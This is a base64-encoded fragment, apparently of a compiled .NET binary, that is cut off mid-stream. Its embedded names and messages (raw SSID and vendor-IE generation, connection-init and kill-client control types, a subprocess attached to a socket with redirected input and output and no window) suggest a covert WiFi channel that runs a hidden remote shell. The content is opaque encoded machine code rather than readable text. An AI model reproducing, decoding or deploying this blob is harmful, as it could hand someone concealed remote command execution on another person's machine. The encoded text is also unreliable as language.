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TUDEAQ1RMTV9UWVBFX0NPTl9JTklUX1JFUTEASUVudW1lcmFibGVgMQBMaW1pdGVkUXVldWVgMQBMaXN0YDEAcGF5MQBJbnQzMgBDVExNX1RZUEVfQ09OX0lOSVRfUlNQMgBDVExNX1RZUEVfQ09OX0lOSVRfUkVRMgBQYWNrZXQyAHBheTIAVG9JbnQ2NABzaW1wbGVDaGVja3N1bTE2AFVJbnQxNgBnZXRfVVRGOABzaW1wbGVDaGVja3N1bTgAPE1vZHVsZT4AUkFXX0lFX0RBVEEAQ1RMTV9UWVBFX1JFU0VUX0xJU1RFTklOR19QUk9DAENPTl9SRVNFVF9SRUFTT05fVU5TUEVDSUZJRUQARE9UMTFfU1NJRAB1Y1NTSUQAQ09OX1JFU0VUX1JFQVNPTl9JTlZBTElEX0NMSUVOVF9JRABjbGllbnRJRABzcnZJRABNVFVfV0lUSF9WRU5fSUUATVRVX1dJVEhPVVRfVkVOX0lFAFNUQVRFX1BFTkRJTkdfQ0xPU0UAU1RBVEVfREVMRVRFAENUTE1fVFlQRV9TRVRfQ0xJRU5UX1BPTExfSU5URVJWQUxMAHdpdGhfVEwAQUNNAE9GRE0ATVNNAFBBWTFfTUFYX0xFTgBQQVkyX01BWF9MRU4AU1RBVEVfT1BFTgBQRU5ESU5HX09QRU4AU3lzdGVtLklPAEVSUABDTF9WRVJfR1RfWFAAQ1RMTV9UWVBFX0NMRUFSX1FVRVVFUwBGSFNTAEhSRFNTUwBDVExNX1RZUEVfQ09OX1JFU0VUAENUTE1fVFlQRV9LSUxMX0NMSUVOVABDT05fUkVTRVRfUkVBU09OX0tJTExfQ0xJRU5UAFNUQVRFX1BFTkRJTkdfQUNDRVBUAE1UVQBJSFYAY2xpZW50SVYAdmFsdWVfXwBiYQBkYQBzYQBnZXRfRGF0YQBwb3BJbmJvdW5kRGF0YQBwdXNoT3V0Ym91bmREYXRhAGxlbkllRGF0YQBwSWVEYXRhAGhhc0luRGF0YQBXbGFuTm90aWZpY2F0aW9uRGF0YQBub3RpZmljYXRpb25EYXRhAHdhaXRGb3JEYXRhAG5vdGlmeURhdGEAcmF3X3NzaWRfZGF0YQByYXdfdmVuX2llX2RhdGEAbXNjb3JsaWIAZGF0YUJsb2IAU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMAQ2xpZW50U3ViUHJvYwBjb25uZWN0QW5kQmluZFByb2MAcHJvYwBwaHlJZABUaHJlYWQAc2VuZF9yZWNlaXZlX3RocmVhZABBZGQAQXV0b2NvbmZFbmFibGVkAEJhY2tncm91bmRTY2FuRW5hYmxlZABzZWN1cml0eUVuYWJsZWQAQXV0b2NvbmZEaXNhYmxlZABCYWNrZ3JvdW5kU2NhbkRpc2FibGVkAEFkSG9jTmV0d29ya0Zvcm1lZABDb25uZWN0ZWQARGlzY29ubmVjdGVkAFByb2ZpbGVzRXhoYXVzdGVkAGFkZF9FcnJvckRhdGFSZWNlaXZlZABhZGRfT3V0cHV0RGF0YVJlY2VpdmVkAHBSZXNlcnZlZAByZXNlcnZlZABzZXJ2ZXJfaWQAcERvdDExU3NpZABkb3QxMVNzaWQAZ2VuZXJhdGVSYXdTc2lkAGRvdDExQnNzaWQAcEludGVyZmFjZUd1aWQAaW50ZXJmYWNlR3VpZABpbnRlcmZhY2VfZ3VpZABpZl9ndWlkADxMaW1pdD5rX19CYWNraW5nRmllbGQASUhWX0VuZABJckJhc2ViYW5kAGNvbW1hbmQAU2VuZABtZXRob2QAYmVhY29uUGVyaW9kAGdlbmVyYXRlUmF3VmVuSWUAZXh0cmFjdEllAFJlcGxhY2UAcHJldk5vdGlmU291cmNlAG5vdGlmU291cmNlAFdsYW5Ob3RpZmljYXRpb25Tb3VyY2UAbm90aWZpY2F0aW9uU291cmNlAHNvdXJjZQBub3RpZmljYXRpb25Db2RlAHJlYXNvbl9jb2RlAEZsYWdDb250cm9sTWVzc2FnZQBBZGRSYW5nZQBQcm9maWxlQ2hhbmdlAFByb2ZpbGVOYW1lQ2hhbmdlAEJzc1R5cGVDaGFuZ2UAQWRob2NOZXR3b3JrU3RhdGVDaGFuZ2UAUG93ZXJTZXR0aW5nQ2hhbmdlAEZpbHRlckxpc3RDaGFuZ2UARW5kSW52b2tlAEJlZ2luSW52b2tlAE5ldHdvcmtBdmFpbGFibGUATmV0d29ya05vdEF2YWlsYWJsZQBSdW50aW1lVHlwZUhhbmRsZQBXbGFuQ2xvc2VIYW5kbGUAY2xvc2VOYXRpdmVXaWZpSGFuZGxlAG9wZW5OYXRpdmVXaWZpSGFuZGxlAG5hdGl2ZVdpZmlIYW5kbGUAR2V0VHlwZUZyb21IYW5kbGUAV2xhbk9wZW5IYW5kbGUARXZlbnRXYWl0SGFuZGxlAGhDbGllbnRIYW5kbGUAbmF0aXZlV2lGaUNsaWVudEhhbmRsZQBjbGllbnRIYW5kbGUAbndpZmlfY2xpZW50X2hhbmRsZQBDb25zb2xlAFdhaXRPbmUAQmVnaW5FcnJvclJlYWRMaW5lAEJlZ2luT3V0cHV0UmVhZExpbmUAV3JpdGVMaW5lAE5vbmUAVmFsdWVUeXBlAERvdDExQnNzVHlwZQBkb3QxMUJzc1R5cGUARG90MTFQaHlUeXBlAGRvdDExQnNzUGh5VHlwZQBzZWFyY2hlZF9pZV90eXBlAGN0bG1fdHlwZQBQdHJUb1N0cnVjdHVyZQBJbmZyYXN0cnVjdHVyZQBDbG9zZQBEaXNwb3NlAGlnbm9yZUR1cGxpY2F0ZQBXbGFuTm90aWZpY2F0aW9uQ2FsbGJhY2tEZWxlZ2F0ZQBNdWx0aWNhc3REZWxlZ2F0ZQBhZ2dyZWdhdGUAV2xhbkludGVyZmFjZVN0YXRlAERlYnVnZ2VyQnJvd3NhYmxlU3RhdGUAaXNTdGF0ZQBTb2NrZXRTdGF0ZQBzdGF0ZQB3YWl0U2NhbkNvbXBsZXRlAENvbm5lY3Rpb25Db21wbGV0ZQBXcml0ZQBDb21waWxlckdlbmVyYXRlZEF0dHJpYnV0ZQBHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUARGVidWdnZXJCcm93c2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUARmxhZ3NBdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAHNldF9Vc2VTaGVsbEV4ZWN1dGUAUmVhZEJ5dGUAaW5fcXVldWUAb3V0X3F1ZXVlAERlcXVldWUARW5xdWV1ZQB2YWx1ZQBSZWNlaXZlAGR3RGF0YVNpemUAZGF0YVNpemUAaWVTaXplAHRvdGFsU2l6ZQBzaXplAFNpemVPZgBzb2NrX2luX2J1ZgBTeXN0ZW0uVGhyZWFkaW5nAEVuY29kaW5nAGJsb2NraW5nAHJ4VmVuSWVXb3JraW5nAHR4VmVuSWVXb3JraW5nAERpc2NvdmVyaW5nAFRvU3RyaW5nAEdldFN0cmluZwBBdXRoZW50aWNhdGluZwBBc3NvY2lhdGluZwBEaXNjb25uZWN0aW5nAEZsdXNoAHB1c2gATWF0aABldGgAdVNTSURMZW5ndGgAZ2V0X0xlbmd0aAByYXRlU2V0TGVuZ3RoAE5XaUZpAE5hdGl2ZVdpZmkAV2xhbmFwaQBwc2kAcnNzaQBmdW5jQ2FsbGJhY2sAQXN5bmNDYWxsYmFjawBjYWxsYmFjawBibG9jawBjc29jawBQZWVrAEFsbG9jSEdsb2JhbABGcmVlSEdsb2JhbABNYXJzaGFsAGRhdGFQdXNoZWRTaWduYWwAZGF0YVBvcHBlZFNpZ25hbABJbnRlcmZhY2VBcnJpdmFsAEludGVyZmFjZVJlbW92YWwAU3lzdGVtLkNvbXBvbmVudE1vZGVsAFNjYW5GYWlsAENvbm5lY3Rpb25BdHRlbXB0RmFpbABBbGwATldpRmkuZGxsAFdsYW5hcGkuZGxsAHdsYW5hcGkuZGxsAFdsYW5Ob3RpZmljYXRpb25Db2RlQWNtAGl0ZW0AU3lzdGVtAFJhbmRvbQBFbnVtAGNoZWNrTGVuZ3RoQ2hlY2tzdW0AV2xhblNjYW4AQm9vbGVhbgBsZW4ATWluAGluUmVnRG9tYWluAGRlc2lyZWRWZXJzaW9uAG5lZ290aWF0ZWRWZXJzaW9uAGNsaWVudFZlcnNpb24AT25BQ01Ob3RpZmljYXRpb24AV2xhblJlZ2lzdGVyTm90aWZpY2F0aW9uAGNhcGFiaWxpdHlJbmZvcm1hdGlvbgBTeXN0ZW0uUmVmbGVjdGlvbgBBcmd1bWVudE91dE9mUmFuZ2VFeGNlcHRpb24AQWNjZXNzVmlvbGF0aW9uRXhjZXB0aW9uAGludGVyZmFjZURlc2NyaXB0aW9uAHNvY2tldF9jbG9zZV9yZWFzb24AcnVuAFVua25vd24AV2xhbkludGVyZmFjZUluZm8Ac2V0X1N0YXJ0SW5mbwBQcm9jZXNzU3RhcnRJbmZvAFplcm8AU2xlZXAAaG9zdFRpbWVzdGFtcAB0aW1lc3RhbXAAc2VuZF9yZWNlaXZlX2xvb3AAcG9wAHNlcQBDbGVhcgBXbGFuSW50ZXJmYWNlSW5mb0xpc3RIZWFkZXIAV2xhbkJzc0xpc3RIZWFkZXIAQnVmZmVyAGJ1ZmZlcgBEYXRhUmVjZWl2ZWRFdmVudEhhbmRsZXIAb3V0X2hhbmRsZXIASGVscGVyAFN0cmVhbVdyaXRlcgBUZXh0V3JpdGVyAEJpdENvbnZlcnRlcgBzZXRfUmVkaXJlY3RTdGFuZGFyZEVycm9yAC5jdG9yAC5jY3RvcgBkYXRhUHRyAHJlc2VydmVkUHRyAFN0cnVjdHVyZVRvUHRyAEludFB0cgBieXRlczJoZXhTdHIAZXRoYWRkcjJzdHIAU3lzdGVtLkRpYWdub3N0aWNzAFdsYW5FbnVtSW50ZXJmYWNlcwBlbnVtSW50ZXJmYWNlcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBnZXRfUmF0ZXMAR2V0Qnl0ZXMATmV4dEJ5dGVzAERhdGFSZWNlaXZlZEV2ZW50QXJncwBkYXRhX2FyZ3MAdGltZW91dE1pbGxpcwBudW1iZXJPZkl0ZW1zAEdldFJhdGVJbk1icHMAUHJvY2VzcwBtYXhBdHRlbXB0cwBjb25fYXR0ZW1wdHMAY29ubmVjdGlvbl9hdHRlbXB0cwBDb25jYXQARm9ybWF0AE9iamVjdABvYmplY3QAQ29ubmVjdABvbkRpc2Nvbm5lY3QAV2xhblJhdGVTZXQAd2xhblJhdGVTZXQAcmF0ZVNldABwYXJzZTJwYWNrZXQAbGFzdF9yeF9wYWNrZXQAdHhfcGFja2V0AG91dHBhY2tldABhdHRhY2hTdWJQcm9jVG9Tb2NrZXQAQ2xpZW50U29ja2V0AHNvY2tldABpZU9mZnNldABzcGxpdABnZXRfTGltaXQAc2V0X0xpbWl0AGxpbWl0AElBc3luY1Jlc3VsdAByZXN1bHQAZG90MTFTc2lkSW50AEluZGVwZW5kZW50AG9uS2lsbENsaWVudABDb21wb25lbnQAQXV0b1Jlc2V0RXZlbnQAZ2V0X0NvdW50AElIVl9TdGFydABUaHJlYWRTdGFydABDb25uZWN0aW9uU3RhcnQAc3RhcnQAcHBJbnRlcmZhY2VMaXN0AFdsYW5HZXROZXR3b3JrQnNzTGlzdAB3bGFuQnNzTGlzdABwcmludF9vdXQAZ2V0X1N0YW5kYXJkSW5wdXQAc2V0X1JlZGlyZWN0U3RhbmRhcmRJbnB1dABpbnB1dABzZXRfUmVkaXJlY3RTdGFuZGFyZE91dHB1dABTeXN0ZW0uVGV4dABjYWxsYmFja0NvbnRleHQAY29udGV4dABTZW5kUmVjdgBzZXRfQ3JlYXRlTm9XaW5kb3cAcmF0ZUluZGV4AGluZGV4AHN1YkFycmF5AFRvQXJyYXkAY2hDZW50ZXJGcmVxdWVuY3kATm90UmVhZHkAQW55AEJsb2NrQ29weQBXbGFuQnNzRW50cnkAbGlua1F1YWxpdHkAb3BfRXF1YWxpdHkAU2VjdXJpdHkAAABTewAwADoAWAAyAH0AOgB7ADEAOgBYADIAfQA6AHsAMgA6AFgAMgB9ADoAewAzADoAWAAyAH0AOgB7ADQAOgBYADIAfQA6AHsANQA6AFgAMgB9AAAJbgB1AGwAbAAAAy0AAQEAW0UAcgByAG8AcgAgAGcAZQBuAGUAcgBhAHQAaQBuAGcAIAByAGEAdwAgAFMAUwBJAEQALAAgAG4AbwAgAHAAYQB5AGwAbwBhAGQAIABkAGUAZgBpAG4AZQBkAABdRQByAHIAbwByACAAZwBlAG4AZQByAGEAdABpAG4AZwAgAHIAYQB3ACAAdgBlAG4ASQBlACwAIABuAG8AIABwAGEAeQBsAG8AYQBkACAAZABlAGYAaQBuAGUAZAAAD1AAYQBjAGsAZQB0AAoAABMJAFMAQQA6AAkAewAwAH0ACgAAEwkARABBADoACQB7ADAAfQAKAAAfCQBjAGwAaQBlAG4AdABJAEQAOgAJAHsAMAB9AAoAABkJAHMAcgB2AEkARAA6AAkAewAwAH0ACgAALwkAUwBTAEkARAAgAHAAYQB5AGwAbwBhAGQAIABsAGUAbgA6AAkAewAwAH0ACgAAJwkAUwBTAEkARAAgAHAAYQB5AGwAbwBhAGQAOgAJAHsAMAB9AAoAACkJAFYAZQBuAGQAbwByACAASQBFACAAcgBhAHcAOgAJAHsAMAB9AAoAADsJAFYAZQBuAGQAbwByACAASQBFACAAIABwAGEAeQBsAG8AYQBkACAAbABlAG4AOgAJAHsAMAB9AAoAADMJAFYAZQBuAGQAbwByACAASQBFACAAIABwAGEAeQBsAG8AYQBkADoACQB7ADAAfQAKAAA3CQBGAGwAYQBnACAAQwBvAG4AdAByAG8AbAAgAE0AZQBzAHMAYQBnAGUAOgAJAHsAMAB9AAoAACEJAEMAVABMAE0AXwBUAFkAUABFADoACQB7ADAAfQAKAAAVCQBTAEUAUQA6AAkAewAwAH0ACgAAFQkAQQBDAEsAOgAJAHsAMAB9AAoAAF1DAG8AbgBuAGUAYwB0AGkAbwBuACAAcgBlAHMAZQB0ACAAZgByAG8AbQAgAHMAZQByAHYAZQByACwAIAByAGUAYQBzAG8AbgAgAGMAbwBkAGUAOgAgAHsAMAB9AAA9UwBlAHIAdgBlAHIAIABpAHMAcwB1AGUAZAAgAEsASQBMAEwAIABDAEwASQBFAE4AVAA6ACAAewAwAH0AAFFDAG8AbgBuAGUAYwB0ACAASQBuAGkAdAAgAFIAZQBxAHUAZQBzAHQAIAAxACAAKAB0AG8AIABzAHIAdgBJAEQAIAB7ADAAfQApAC4ALgAuAAB7LgAuAC4AIABjAG8AbgBuAGUAYwB0ACAASQBuAGkAdAAgAFIAZQBzAHAAbwBuAHMAZQAgADEAIAByAGUAYwBlAGkAdgBlAGQAIAAoAEMAbABpAGUAbgB0ACAASQBEACAAewAwAH0AIABhAHMAcwBpAGcAbgBlAGQAKQAAIU4AbwB0AGgAaQBuAGcAIAByAGUAYwBlAGkAdgBlAGQAADVDAG8AbgBuAGUAYwB0ACAASQBuAGkAdAAgAFIAZQBxAHUAZQBzAHQAIAAyACAALgAuAC4AAEkuAC4ALgAgAGMAbwBuAG4AZQBjAHQAIABJAG4AaQB0ACAAUgBlAHMAcABvAG4AcwBlACAAMgAgAHIAZQBjAGUAaQB2AGUAZAAAI04AbwB0AGgAaQBuAGcAIAByAGUAYwBlAGkAdgBlAGQACgAAUUMAbwBuAG4AZQBjAHQAaQBvAG4AIABvAHAAZQBuACwAIABzAHQAYQByAHQAaQBuAGcAIABkAGEAdABhACAAdABhAHIAbgBzAGYAZQByACEAAEFTAHQAYQByAHQAaQBuAGcAIABzAGUAbgBkACAAYQBuAGQAIAByAGUAYwBlAGkAdgBlACAAdABoAHIAZQBhAGQAAEs9AD0APQA9AD0APQA9AD0APQA9AD0AIABTAEMAQQBOACAAPQA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AABTPQA9AD0APQA9AD0APQA9AD0APQA9ACAAUwBDAEEATgAgAEUATgBEACAAPQA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AACAm0QAaQBzAGMAYQByAGQAaQBuAGcAIAByAGUAcwB0ACAAbwBmACAAaQBuAGIAbwB1AG4AZAAgAGQAYQB0AGEALAAgAGEAcwAgAHUAcABkAGEAdABlAGQAIABUAFgAIABwAGEAYwBrAGUAdAAgAGgAYQBzACAAdABvACAAYgBlACAAcwBlAG4AdAAgAGYAaQByAHMAdAAuAC4ALgAAQUkAZwBuAG8AcgBpAG4AZwAgAHAAYQBjAGsAZQB0ACAAZgBvAHIAIABvAHQAaABlAHIAIABDAGwAaQBlAG4AdAAANyoAKgAqACoAKgAqACAATgBlAHcAIABPAFUAVABEAEEAVABBACAAKgAqACoAKgAqACoAKgAqAAApKgAqACoAKgAqAE4AZQB3ACAASQBOAEQAQQBUAEEAKgAqACoAKgAqAAA/UAByAG8AYgBlACAAUgBlAHEAdQBlAHMAdAAgAHMAZQBuAHQACgAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQABS1IAZQBjAGUAaQB2AGUAZAAgAFAAcgBvAGIAZQAgAFIAZQBzAHAAbwBuAHMAZQAKAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0AAXtJAG4AcQB1AGUAdQBlACAAbABpAG0AaQB0ACAAewAwAH0AIAByAGUAYQBjAGgAZQBkACwAIABkAGEAdABhACAAbgBlAGUAZABzACAAdABvACAAYgBlACAAcABvAHAAcABlAGQAIAB0AG8AIAByAGUAYwBlAGkAdgBlAABhUABhAGMAawBlAHQAIABpAGcAbgBvAHIAZQBkACwAIABiAGU